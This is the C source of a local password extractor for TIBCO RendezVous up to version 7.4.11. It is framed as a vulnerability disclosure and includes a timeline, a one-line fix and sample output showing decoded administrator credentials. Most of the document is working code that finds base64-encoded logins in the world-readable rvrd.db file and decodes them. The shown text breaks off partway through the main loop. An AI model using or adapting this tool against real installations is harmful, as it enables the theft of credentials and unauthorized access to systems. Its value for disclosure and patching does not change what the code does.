/* Exploit: TIBCO RendezVous local password extractor version <=7.4.11 Affected products: Tibco RendezOVous version <=7.4.11 Author: Andres Tarasco AcuƱa (atarasco @ sia.es) Advisory: http://www.514.es Status: Vendor notifification Timeline: ---------------- Discovered: who cares? Exploit coded: xxxxxxxxxxx Vendor Notified: xxxxxxxxx Vendor patch: xxxxxxxxxxxx Public Disclosure: xxxxxxx Description: Tibco products stores login and passwords in base64 without crypting them. Password file is also accesible for everyone (at least under win32 enviroment). Fix: Add restrictive ACLS to avoid data leak D:\ProgramaciĆ³n\tibco>tibco.exe c:\rvrd.db Tibco RendezVous Password Dumper Affected versions <=v7.4.11 Author: Andres Tarasco ( atarasco @ sia.es) Url: http://www.514.es [+] Tibco Logfile Opened (44068 bytes) [+] Password Found at offset: 0xe53 (29 bytes) Base64: QWRtaW5pc3RyYXRvcjpBQUFBQUE= Decoded: Administrator:AAAAAA [+] Password Found at offset: 0xe8a (17 bytes) Base64: QWRtaW46ZnV4b3I= Decoded: Admin:fuxor [+] Password Found at offset: 0x104b (17 bytes) Base64: YWRtaW46dGVzdA== Decoded: admin:test [+] Password Found at offset: 0x108a (17 bytes) Base64: QWRtaW46ZnV4b3I= Decoded: Admin:fuxor [+] Password Found at offset: 0x10b5 (17 bytes) Base64: YWRtaW46bWFzdGVy Decoded: admin:master */ #include #include #define DECODE64(c) (isascii(c) ? base64val[c] : -1) static const char base64val[] = { -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1 }; int Base64Decode( char* out, const char* in, unsigned long size ) { int len = 0; register unsigned char digit1, digit2, digit3, digit4; if (in[0] == '+' && in[1] == ' ') in += 2; if (*in == '\r') return(0); do { digit1 = in[0]; if (DECODE64(digit1) == -1) return(-1); digit2 = in[1]; if (DECODE64(digit2) == -1) return(-1); digit3 = in[2]; if (digit3 != '=' && DECODE64(digit3) == -1) return(-1); digit4 = in[3]; if (digit4 != '=' && DECODE64(digit4) == -1) return(-1); in += 4; *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4); ++len; if (digit3 != '=') { *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2); ++len; if (digit4 != '=') { *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4); ++len; } } } while (*in && *in != '\r' && digit4 != '='); return (len); } /******************************************************************************/ void main (int argc,char *argv[]) { DWORD size,i,read; int port; char *buffer,l,j,a; char base64pass[0xff],pass[0xff]; unsigned char data[9] = {0x73, 0x65, 0x72, 0x70, 0x61, 0x73, 0x73, 0x00, 0x08}; HANDLE f; int total=0; printf("Tibco RendezVous Password Dumper\n"); printf("Author: Andres Tarasco ( atarasco @ sia.es)\n"); printf("Url: http://www.514.es\n\n"); if (argc!=2) { printf("Usage: Tibco.exe c:\\rvrd.db\n\n"); exit(1); } f=CreateFile(argv[1],GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, OPEN_EXISTING, 0, NULL); if (f!=INVALID_HANDLE_VALUE) { size=GetFileSize(f,NULL); if (size>0) { printf("[+] Tibco Logfile Opened (%i bytes)\n",size); buffer=(char *)malloc(size); ReadFile(f, &buffer[0], size, &read, NULL); for(i=0;i